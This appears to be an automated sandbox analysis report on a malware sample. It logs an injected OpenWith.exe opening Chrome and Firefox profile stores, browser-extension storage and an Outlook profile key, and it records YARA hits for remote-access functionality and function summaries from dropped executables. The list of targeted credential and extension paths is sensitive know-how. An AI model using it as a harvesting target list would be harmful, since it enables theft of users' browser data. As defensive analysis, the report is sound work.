Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\thumbnails
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing\google4
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\trash16598
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: Yara match File source: Process Memory Space: OpenWith.exe PID: 6736, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000010.00000003.2230681896.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2580835245.000001BD77AF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2280661154.0000000004720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2201808869.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2328824365.000001BD778F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63B14B8 socket,bind, 20_3_00007DF4B63B14B8
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B637F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 20_3_00007DF4B637F83C
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D10098 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 22_2_00D10098
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00CE2340 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ, 22_2_00CE2340
Source: C:\Users\user\AppData\Local\Microsoft\Yuem.exe Code function: 22_2_00D0F3A1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 22_2_00D0F3A1
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A80098 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 23_2_00A80098
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A52340 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ, 23_2_00A52340
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 23_2_00A7F3A1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 23_2_00A7F3A1
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A80098 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 24_2_00A80098
Source: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe Code function: 24_2_00A7F3A1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 24_2_00A7F3A1